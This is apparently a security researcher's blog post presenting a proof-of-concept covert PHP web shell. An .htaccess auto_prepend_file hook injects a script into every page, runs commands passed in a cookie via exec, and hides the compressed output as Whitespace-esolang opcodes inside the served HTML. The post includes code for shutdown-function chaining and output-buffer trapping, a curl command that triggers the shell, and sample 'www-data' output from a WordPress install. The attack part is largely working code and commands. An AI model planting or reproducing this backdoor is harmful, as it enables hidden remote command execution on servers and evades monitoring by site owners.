Whitespace Esolang Covert Channel / Steganography

I’ve been always a fan of esoteric programming languages (esolangs). These programming languages are generally made just for fun, mostly in universities or for challenges. Wikipedia describes as the following:

An esoteric programming language (esolang, in short) is a programming language designed to test the boundaries of computer programming language design, as a proof of concept, or as a joke. The use of esoteric distinguishes these languages from programming languages that working developers use to write software.

You’ve probably seen some of the famous ones like brainfuck and shakespeare language. Some months ago I stumbled upon this funny one called “Whitespace“.

About Whitespace esolang

Whitespace is an esolang created by Edwin Brady and Chris Morris from the University of Durham in released in 2003. Their opcodes consists only of spaces, tabs and line-feeds. Interesting, huh?

Here’s a sample Hello, World! program in Whitespace (red = spaces, blue = tabs, black = VIM cursor):


This “feature” came into my mind as a very difficult pattern to detect through computational means since the language natively discards every other character permitting this language to be merged arbitrarily with any other text…. and even some code 😉

I’ve then remembered that HTML has cool workarounds with repeated spaces and tabs when it comes to parsing and rendering, so I could be able to inject Whitespace opcodes into HTML without breaking it and with minor rendering quirks.

So the weather was crappy, beer was over and I decided to make a covert shell with that.

Creating the covert shell

PHP is one of the most used languages in websites and power popular platforms like WordPress and MediaWiki. PHP has an output buffering system (ob_start, ob_get_contents etc) and a widely abused feature called auto_prepend_file. These would be enough to setup my covert shell.

I quickly spawned two files, one .htaccess to handle my shell injection via auto_prepend_file (very known and old trick) and one wcc.php to do the magic.

php_value auto_prepend_file "wcc.php"

This would ensure my shell works on almost any php page on the target acessible through the browser.

First thing I had to do was ensure that the I’ve got the output buffer after all other possible output buffer handlers had processed it. There’s quite a time since I left web developing but I did remembered about register_shutdown_function that is used to, you know, register functions that will run before the script exits.

I could’ve stopped there, but I’ve wanted to prevent other register_shutdown_functions to win the race and alter the output after I did, so I did some research and saw that if you call register_shutdown_function from a register_shutdown_function, it will have high chances of being the last shutdown function (unless other register_shutdown_function did the same trick).

function wcc_init() {
	# ... snip ...

	# Register shutdown function that registers a 
	# shutdown function as last in chain ;)
	# (unless another shutdown functions does the same)
	register_shutdown_function('wcc_shutdown', $cmd_output);
}//end :: wcc_init

And further down…

function wcc_shutdown($whitespace_payload) {
	register_shutdown_function('wcc_merge_output', $whitespace_payload); # register last ;)
}//end :: wcc_shutdown

That took care of ensuring that my wcc_merge_output function will run at the very end of any script.

Now it’s time to play with the output buffer and do the whitespace magic. I’ve placed ob_start on my wcc_init function that is prepended by .htaccess so as soon as script starts, output buffering is enabled.

If the magic cookie key is set, it will run the command with exec (for testing purposes, you can change to whichever method you want), gzdeflate-it and convert to whitespace language.

I won’t comment on the actual code responsible to converting from ASCII to Whitespace but FYI, it basically converts each char to binary, pushes each character to Whitespace Stack, then adds “print char from stack” N times, where N = len(string) and finally adds the “end program” sentence.

You can read more about the internals of Whitespace Language on the official page’s tutorial. If you’re interested, you can check the wcc_whitespace_print_string function source-code.

The wcc_init function ended up looking like this:

function wcc_init() {
	if (
		!isset($_COOKIE[WCC_COOKIE_KEY]) ||
	) return false;


	$cmd_output = wcc_exec($_COOKIE[WCC_COOKIE_KEY]);

	register_shutdown_function('wcc_shutdown', $cmd_output);

	return true;

}//end :: wcc_init

When the original script finishes its job and execution is passed to my shutdown function, wcc_merge_output will grab the contents of the output buffer, merge, display and exit.

function wcc_merge_output($whitespace_payload) {

	$page_content = ob_get_contents();

	# "Sanitize" page content and tokenize
	# ... snip ...

	# Build Content
	$final_content = wcc_build_content($whitespace_tokens, $content_tokens);

	# Show content & exit
	print $final_content;

}//end :: wcc_merge_output

The caveat

Of course, nothing comes easy. I decided to test the WCC on a real (little old) WordPress install so I pulled up an old VM that I had it installed.

My buffer was being ignored or duplicated, depending on the page. Turns out I did not account the race condition that other codes might introduce when handling output buffer and they were flushing the buffer before I could act, so I created a little trap to prevent others from messing with it.

# in script start
global $buffer; 

# in wcc_init()
# this trap will be called when something 
# tries to display the output buffer

# Trap function added
# Someone tries to output the buffer before us
# and ... OMG! IT'S A TRAP!
function wcc_output_trap($current_buffer) {
    global $buffer;
    $buffer .= $current_buffer; # let's save it for later
    return ''; # prevents showing the buffer yet
}//end :: wcc_output_trap

# in wcc_merge_output()
$page_content = $buffer.ob_get_contents(); # now we can show everything

As from the documentation for the callback parameter from ob_start:

The function will be called when the output buffer is flushed (sent) or cleaned (with ob_flush(), ob_clean() or similar function) or when the output buffer is flushed to the browser at the end of the request.

That did the trick.

The sanitization and tokenization process is quite simple.

For content, first I replace all tabs to spaces, place each line in an array with respective line number as index. Then I remove the linefeeds from the each line and break the line into tokens separated by spaces.

For whitespace, I just convert a string to an array of characters. Dead simple.

Merging content

This is quite simple also. For each whitespace token (character/opcode), I add one of the content parts (tokens) followed by the whitespace token.

If whitespace payload is less than content, when I finish adding whitespace tokens, I just add the remaining pieces glued toghether by spaces and keep their line feeds.

If whitespace payload is greater than content, I just add raw whitespace payload to the end of the HTML content. This brings up some issues on detection but it’s better than no output at all. Just choose a page with more content.

You can check it out the source-code of this routine.

Issuing requests to the shell

In this PoC I’ve used the classic Cookie command input trick.

define('WCC_COOKIE_KEY', 'wcc_cmd');

So through a shell, you can do something like

curl -s -H 'Cookie: wcc_cmd=id' -o out.html

Then parse with any Whitespace interpreter and inflate the payload again

./wspace out.html | head -n -3 | php inflate.php

inflate.php reads input from stdin and passes to gzinflate.


= WCC = Command output ==========================

uid=33(www-data) gid=33(www-data) groups=33(www-data)
= WCC = EOF =====================================

Visual Differences

For some content you might get some quirks, for others, not.

Here’s a screenshot from both pages sources. First with embedded Whitespace command output and the second is the original.

Whitespace HTML Source Comparison

Here’s a screenshot from both pages rendered HTML. First with embedded Whitespace command output and the second is the original. (Don’t mind the images, this theme has random header images)

Whitespace Rendered HTML Comparison

Size discrepancies

Since we’re mostly changing stuff than adding, our file size ends up very close to the original if you have enought HTML to fit your command output. Below is the comparison of the original HTML with one with the output from some commands.

I’ve ran id, ip a show, ps aux and ls -al. id was the only one that fit entirely in the HTML I’ve got (pretty short page). The others resulted in raw whitespace appended to the end of the original HTML.

$ ls -al /tmp/{original,cmd*}.html
-rw-rw-r-- 1 jseidl jseidl 14778 Feb 18 20:47 /tmp/original.html
-rw-rw-r-- 1 jseidl jseidl 14191 Feb 18 20:36 /tmp/cmd_id.html
-rw-rw-r-- 1 jseidl jseidl 16986 Feb 18 20:50 /tmp/cmd_ip_a_show.html
-rw-rw-r-- 1 jseidl jseidl 19013 Feb 18 20:50 /tmp/cmd_ls_al.html
-rw-rw-r-- 1 jseidl jseidl 41000 Feb 18 20:50 /tmp/cmd_ps_aux.html

LOL. In some cases it even “minifies” a little…

Final notes

  • I did not put any effort on encoding/encrypting the cookie or commands or whatever. This is only to test the covert response channel.
  • I also know that cookie based command passing is easily detectable. And are many other better ways to do that.
  • Of course there are better methods than exec to run code. This is also not the point of this research.

Source code & files

All files are available on my github repo. Feel free to download, play, fork, whatever.